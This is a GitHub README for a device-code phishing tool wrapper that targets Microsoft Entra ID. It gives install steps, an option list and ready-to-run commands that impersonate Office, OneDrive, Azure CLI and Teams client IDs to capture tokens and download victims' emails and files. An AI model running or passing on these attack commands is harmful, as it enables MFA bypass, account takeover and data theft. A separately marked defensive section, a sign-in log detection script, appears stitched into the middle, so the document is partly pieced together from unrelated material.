Cedric-Martz/DeviceCodePhishing_wrapper

DeviceCodePhishing Enhanced

DISCLAIMER: This tool is for educational and authorized penetration testing purposes only. Unauthorized usage is strictly discouraged and may be illegal.

Description

DeviceCodePhishing Enhanced is an advanced phishing tool that leverages the Device Code Flow to bypass two-factor authentication, including FIDO protection. This wrapper version includes additional features for data exfiltration and comprehensive reporting.

NB: I added an old version of DeviceCodePhishing (v1.0.1) to the repository. For information about the releases, please visit this repository: https://github.com/denniskniep/DeviceCodePhishing/releases.

Features

  • script_DeviceCodePhishing: A wrapper working with the DeviceCodePhishing binary.

Installation

Prerequisites

  • Go 1.23+ (required for compilation)
  • Python 3.x (required for my wrapper)
  • Tested on Linux environment

Go Installation

Go 1.23+ is only needed if you want to build your own DeviceCodePhishing version. It is not required if you are happy with the provided binary; however, building the binary yourself is a good thing to do.

# Download Go 1.23.4+ from https://go.dev/dl/
# (the commands below assume the archive go1.23.4.linux-amd64.tar.gz)

sudo rm -rf /usr/local/go
sudo tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz

# Add to PATH (add to ~/.bashrc or ~/.zshrc)
export PATH=$PATH:/usr/local/go/bin
source ~/.bashrc  # or ~/.zshrc

Binary Installation

Option 1: Download Pre-built Binary

# Download release 1.0.1 (DeviceCodePhishing-linux-amd64) from the releases page of
# https://github.com/denniskniep/DeviceCodePhishing

chmod +x DeviceCodePhishing-linux-amd64
# Put the binary, renamed DeviceCodePhishing, in /usr/local/bin
sudo mv DeviceCodePhishing-linux-amd64 /usr/local/bin/DeviceCodePhishing

Option 2: Compile from Source

# Clone the repository
git clone https://github.com/denniskniep/DeviceCodePhishing.git
cd DeviceCodePhishing

# Compile the binary
go build -o DeviceCodePhishing .

# Install system-wide
sudo cp DeviceCodePhishing /usr/local/bin/DeviceCodePhishing

Python Wrapper Installation

The Python wrapper (script_DeviceCodePhishing.py) automatically looks for the DeviceCodePhishing binary in the following order:

  1. /usr/local/bin/DeviceCodePhishing (system installation)
  2. Current directory ./DeviceCodePhishing
  3. System PATH

You may need to install the requests package:

# Install Python dependencies
pip3 install requests

Development & Compilation

Making Changes

If you modify the source code in the DeviceCodePhishing/ directory:

  1. Navigate to the project directory:

    cd DeviceCodePhishing/

  2. Update dependencies (if needed):

    go mod tidy

  3. Compile the project:

    go build -o DeviceCodePhishing .

  4. Update system binary (recommended):

    sudo cp DeviceCodePhishing /usr/local/bin/DeviceCodePhishing

  5. Verify changes:

    DeviceCodePhishing server --help

Project Structure

DeviceCodePhishing/
├── cmd/                  # Command-line interface
│   ├── root.go           # Root command
│   └── server.go         # Server implementation
├── pkg/                  # Core packages
│   ├── entra/            # Azure Entra ID integration
│   └── utils/            # Utility functions
├── main.go               # Main entry point
├── go.mod                # Go module definition
└── go.sum                # Go module checksums

Usage Examples

Basic Usage

# Start the phishing server with default settings
python3 script_DeviceCodePhishing.py

Advanced Configuration

Microsoft Outlook Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "d3590ed6-52b3-4102-aeff-aad2292ab01c" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_outlook.json" \
  --download-emails 100 \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

OneDrive Sync Engine Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "ab9b8c07-8f02-4f72-87fa-80105867a763" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_onedrive.json" \
  --download-emails 50 \
  --download-files \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Azure CLI Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "04b07795-8ddb-461a-bbee-02f9e1bf7b46" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_azurecli.json" \
  --download-emails 100 \
  --download-files \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Microsoft Teams Targeting

python3 script_DeviceCodePhishing.py \
  --address ":8080" \
  --client-id "1fec8e78-bce4-4aaf-ab1b-5451cc387264" \
  --tenant "common" \
  --output-file "tokens.txt" \
  --report-file "rapport_teams.json" \
  --download-emails 50 \
  --output-dir "./demo_exfiltration" \
  --auto \
  --verbose

Available Client IDs

| Client ID | Application | Description | Use Case |
|---|---|---|---|
| d3590ed6-52b3-4102-aeff-aad2292ab01c | Microsoft Office | Office 365 applications | Email, documents access |
| ab9b8c07-8f02-4f72-87fa-80105867a763 | OneDrive Sync Engine | File synchronization | File system access |
| 04b07795-8ddb-461a-bbee-02f9e1bf7b46 | Azure CLI | Command-line interface | Administrative access |
| 1fec8e78-bce4-4aaf-ab1b-5451cc387264 | Microsoft Teams | Communication platform | Chat, files, meetings |
| 29d9ed98-a469-4536-ade2-f981bc1d605e | Authentication Broker | Default broker | General authentication |
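The detection side of the table above, as an added example that is not part of this repository: a triage pass over exported Entra ID sign-in records that reports device-code sign-ins by accounts not expected to use the flow and labels the client IDs listed here. Field names are assumed to follow the Microsoft Graph signIn resource; the sample records, the `expected_users` allow-list and the function name are constructed for illustration, and records are assumed to be in chronological order.

```python
import json

# Client IDs from the "Available Client IDs" table in this README.
WATCHED_APPS = {
    "d3590ed6-52b3-4102-aeff-aad2292ab01c": "Microsoft Office",
    "ab9b8c07-8f02-4f72-87fa-80105867a763": "OneDrive Sync Engine",
    "04b07795-8ddb-461a-bbee-02f9e1bf7b46": "Azure CLI",
    "1fec8e78-bce4-4aaf-ab1b-5451cc387264": "Microsoft Teams",
    "29d9ed98-a469-4536-ade2-f981bc1d605e": "Authentication Broker",
}

# Constructed sample sign-in records (JSON lines); not real log data.
SAMPLE_LOG = """\
{"createdDateTime":"2025-01-10T08:01:00Z","userPrincipalName":"alice@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"none","ipAddress":"198.51.100.10","status":{"errorCode":0}}
{"createdDateTime":"2025-01-10T09:15:00Z","userPrincipalName":"alice@example.com","appId":"d3590ed6-52b3-4102-aeff-aad2292ab01c","authenticationProtocol":"deviceCode","ipAddress":"203.0.113.77","status":{"errorCode":0}}
{"createdDateTime":"2025-01-10T09:20:00Z","userPrincipalName":"kiosk01@example.com","appId":"29d9ed98-a469-4536-ade2-f981bc1d605e","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.20","status":{"errorCode":0}}
{"createdDateTime":"2025-01-10T09:30:00Z","userPrincipalName":"bob@example.com","appId":"04b07795-8ddb-461a-bbee-02f9e1bf7b46","authenticationProtocol":"deviceCode","ipAddress":"198.51.100.30","status":{"errorCode":1}}
not-json garbage line
"""

def find_device_code_signins(lines, expected_users=()):
    """Report device-code sign-ins by accounts not expected to use the flow."""
    seen_ips = {}  # user -> IPs seen in earlier non-device-code sign-ins
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the run
        if not isinstance(rec, dict):
            continue
        user = str(rec.get("userPrincipalName", "")).lower()
        ip = rec.get("ipAddress")
        if str(rec.get("authenticationProtocol", "")).lower() != "devicecode":
            seen_ips.setdefault(user, set()).add(ip)
            continue
        if user in expected_users:
            continue  # e.g. shared devices that legitimately use device code
        findings.append({
            "time": rec.get("createdDateTime"),
            "user": user,
            "app": WATCHED_APPS.get(rec.get("appId"), "other"),
            "succeeded": (rec.get("status") or {}).get("errorCode") == 0,
            "new_ip": ip not in seen_ips.get(user, set()),  # triage hint only
        })
    return findings

if __name__ == "__main__":
    for f in find_device_code_signins(SAMPLE_LOG.splitlines(), {"kiosk01@example.com"}):
        print(f)
```

Where no account needs the flow, blocking device code flow with a Conditional Access policy removes the exposure and leaves this check as a backstop.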

Command Line Options

  --address string          Server listening address (default ":8080")
  --client-id string        OAuth client ID to impersonate
  --tenant string           Azure tenant (default "common")
  --scope string            OAuth scope (default "https://graph.microsoft.com/.default")
  --user-agent string       Custom user agent string
  --output-file string      File to save tokens
  --report-file string      JSON report output file
  --download-emails int     Number of emails to download (default 50)
  --download-files          Download OneDrive files
  --output-dir string       Directory for downloaded data (default "./exfiltrated_data")
  --auto                    Auto-execute Microsoft Graph calls (after the server is stopped with Ctrl+C)
  --verbose                 Enable verbose logging
  --no-banner               Disable banner display
  --dry-run                 Show command without executing

Troubleshooting

Binary Not Found

If you get "DeviceCodePhishing command not found":

# Check if binary exists
ls -la /usr/local/bin/DeviceCodePhishing

# If not found, reinstall
sudo cp ./DeviceCodePhishing /usr/local/bin/DeviceCodePhishing
sudo chmod +x /usr/local/bin/DeviceCodePhishing

Compilation Errors

If you encounter Go compilation errors:

# Check Go version (requires 1.23+)
go version

# Clean module cache
go clean -modcache

# Update dependencies
go mod tidy

# Rebuild
go build -o DeviceCodePhishing .

Permission Issues

# Fix permissions for the binary
sudo chown root:root /usr/local/bin/DeviceCodePhishing
sudo chmod 755 /usr/local/bin/DeviceCodePhishing

Security Considerations

  • Educational Use Only: This tool is designed for authorized penetration testing and security research
  • Legal Compliance: Ensure you have proper authorization before testing
  • Responsible Disclosure: Report vulnerabilities through appropriate channels
  • Data Protection: Handle collected data according to privacy regulations

Contributing

  1. Fork the repository
  2. Create a feature branch
  3. Make your changes
  4. Test thoroughly
  5. Submit a pull request

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

Related Projects

About

This is a wrapper around an older version of DeviceCodePhishing, made by denniskniep. His repository: https://github.com/denniskniep/DeviceCodePhishing
